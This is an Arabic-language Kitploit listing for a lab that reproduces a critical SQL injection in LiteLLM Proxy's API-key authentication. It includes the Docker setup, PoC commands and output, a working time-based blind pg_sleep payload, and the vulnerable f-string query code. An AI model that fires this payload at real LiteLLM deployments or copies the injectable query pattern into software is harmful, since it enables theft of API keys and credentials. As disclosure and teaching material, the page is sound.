Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42208_lab — بيئة استنساخ لثغرة حقن SQL حرجة في مصادقة مفتاح API الخاص بـ LiteLLM Proxy، مع إثبات مفهوم أعمى قائم على الوقت وإعداد Docker للاختبار. | Kitploit
أدوات/GitHubGitHub/imjdl/cve-2026-42208_lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubimjdl/cve-2026-42208_lab

CVE-2026-42208_lab

بيئة استنساخ لثغرة حقن SQL حرجة في مصادقة مفتاح API الخاص بـ LiteLLM Proxy، مع إثبات مفهوم أعمى قائم على الوقت وإعداد Docker للاختبار.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة حقن SQL في LiteLLM Proxy (GHSA-r75f-5x8p-qvmc)

بيئة إعادة إنتاج لثغرة حقن SQL في تدفق مصادقة مفاتيح API الخاصة بـ LiteLLM Proxy.

ملخص الثغرة

العنصرالتفاصيل
الاستشارةGHSA-r75f-5x8p-qvmc
النوعحقن SQL (CWE-89)
الخطورةحرجة
المتأثرlitellm >=1.81.16, <1.83.7
الإصلاحlitellm >=1.83.7 (commit 4dc416ee74)

مسار الهجوم

يحدث الحقن في مسار استدعاء معالجة الأخطاء، وليس في تدفق المصادقة الرئيسي. عند إرسال رمز مميز بدون بادئة sk-، يفشل التأكيد ويتدفق الرمز الخام (غير المُجزّأ) عبر سلسلة استدعاءات الفشل إلى استعلام SQL يستخدم استيفاء f-string:

root@kitploit:~
HTTP request: Authorization: Bearer <payload>
  → assert api_key.startswith("sk-") fails
  → _handle_authentication_error(api_key=RAW_TOKEN)
  → post_call_failure_hook
  → _enrich_failure_metadata_with_key_info
  → get_key_object(hashed_token=RAW_TOKEN)
  → get_data(token=RAW_TOKEN, table_name="combined_view")
  → SQL: WHERE v.token = '{RAW_TOKEN}'  ← INJECTION

مسار المصادقة الرئيسي sk- غير قابل للاستغلال لأن الرموز يتم تجزئتها بـ SHA256 قبل الوصول إلى الاستعلام، مما ينتج أحرف [0-9a-f] فقط.

إعادة الإنتاج

1. تشغيل البيئة الضعيفة

root@kitploit:~
docker compose up -d

يؤدي هذا إلى تشغيل LiteLLM Proxy (v1.83.3-stable) مع قاعدة بيانات PostgreSQL خلفية.

2. تشغيل PoC

root@kitploit:~
pip install requests
python poc_litellm_sqli.py --target http://localhost:4000 --delay 5

المخرجات المتوقعة

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║   LiteLLM Proxy SQL Injection PoC                        ║
║   GHSA-r75f-5x8p-qvmc | CVE: Pending                    ║
║   Affected: litellm >=1.81.16, <1.83.7                  ║
║   Attack: time-based blind via error-handling callback    ║
╚═══════════════════════════════════════════════════════════╝

[*] Checking target: http://localhost:4000
[+] Target alive (status 200)

[*] Measuring baseline (3 requests)...
  Baseline avg: 0.022s

[*] Control: non-sk- token without pg_sleep...
  Control: 0.024s

=======================================================
  Time-based Blind SQL Injection (pg_sleep=5s)
=======================================================
  Payload: ' OR (SELECT 1 FROM (SELECT pg_sleep(5)) t) IS NOT NULL--
  Response: 5.018s

[+] VULNERABLE! pg_sleep(5) confirmed

التفاصيل الفنية

بناء الحمولة

تُرجع دالة pg_sleep() في PostgreSQL قيمة void، والتي لا يمكن أن تظهر في سياق منطقي (OR). تقوم الحمولة بتغليفها في استعلام فرعي لتجنب خطأ النوع:

root@kitploit:~
' OR (SELECT 1 FROM (SELECT pg_sleep(N)) t) IS NOT NULL--

يتم حقن هذا في استعلام combined_view في litellm/proxy/utils.py:

root@kitploit:~
# Vulnerable code (<=v1.83.3)
sql_query = f"""
    SELECT v.*, t.spend AS team_spend, ...
    FROM "LiteLLM_VerificationToken" AS v
    LEFT JOIN ...
    WHERE v.token = '{token}'   ← f-string interpolation of user input
"""

التأثير

  • بدون مصادقة — لا يتطلب مفتاح API صالح
  • وصول قراءة لقاعدة البيانات — استخراج أي بيانات عبر الحقن الأعمى (مفاتيح API، بيانات الاعتماد، الإعدادات)
  • جميع مفاتيح مزودي LLM التي يديرها الوكيل معرضة للخطر

المراجع

  • استشارة أمان GitHub
  • commit الإصلاح 4dc416ee74
  • تقرير استخبارات التهديدات من Sysdig TRT — تم رصد استغلال في البرية خلال 36 ساعة من الإفصاح
تنزيل الأداة